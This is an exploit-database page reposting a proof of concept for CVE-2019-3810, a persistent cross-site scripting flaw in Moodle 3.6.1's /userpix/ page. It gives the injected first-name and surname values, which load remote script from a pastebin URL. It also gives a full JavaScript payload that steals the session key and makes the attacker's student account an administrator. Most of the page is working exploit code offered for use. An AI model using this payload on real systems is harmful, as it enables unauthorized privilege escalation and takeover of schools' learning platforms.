Advertisement






Moodle 3.6.1 Persistent Cross-Site Scripting (XSS)

CVE Category Price Severity
CVE-2019-3810 CWE-79 Not specified High
Author Risk Exploitation Type Date
garethheyes High Remote 2021-04-30
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 0 0

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021040173

Below is a copy:

Moodle 3.6.1 Persistent Cross-Site Scripting (XSS)
# Exploit Title: Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)
# Date: 04/2021
# Exploit Author: farisv
# Vendor Homepage: https://moodle.org/
# Software Link: https://download.moodle.org https://github.com/moodle/moodle/archive/refs/tags/v3.6.1.zip
# Version: Moodle < 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16
# CVE: CVE-2019-3810

Moodle is a learning platform designed to provide educators, administrators,
and learners with a single robust, secure and integrated system to create
personalised learning environments.

The following is PoC to use the XSS bug on /userpix/ (CVE-2019-3810) for
privilege escalation from student to administrator.

1. Upload the XSS payload [1] to pastebin or other similar service.
   Change the value of userid to your own id.
   Let's say the URL is https://pastebin.com/raw/xxxxxxxx.
2. Login to your student account.
3. Set first name with:
   " style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement
4. Set surname with:
  ('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')
5. Ask the administrator to open /userpix/ page or put the link to that page
   on your post and wait.

If successful, your account will be added as administrator.

See the demonstration video on https://github.com/farisv/Moodle-CVE-2019-3810

[1] XSS Payload for privilege escalation on Moodle. Change the value of userid to your id.

var webroot = '/';
var userid = '3';
var sesskey = '';

function get(path, success) {
    var xhr = new XMLHttpRequest();
    xhr.open('GET', webroot + path);
    xhr.onreadystatechange = function() {
        if (xhr.readyState > 3 && xhr.status == 200) {
            success(xhr.responseText);
        }
    };
    xhr.send();
    return xhr;
}

function post(path, data, success) {
    var xhr = new XMLHttpRequest();
    xhr.open('POST', webroot + path);
    xhr.onreadystatechange = function() {
        if (xhr.readyState > 3 && xhr.status == 200) {
            success(xhr.responseText);
        }
    };
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xhr.send(encodeURI(data));
    return xhr;
}

function setAdmin() {
    // Assign administrator access to userid
    bpath = 'admin/roles/admins.php';
    data = "confirmadd=" + userid + "&sesskey=" + sesskey;
    post(bpath, data, function(data){});
}

function getSesskey(data) {
    var sesskey_find = data.indexOf('"sesskey":"');
    sesskey = data.substr(sesskey_find + 11, 10);
    setAdmin();
}

function payload() {
    // We can find Sesskey inside JS script in main page
    get('', getSesskey);
}

// Start
payload();

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum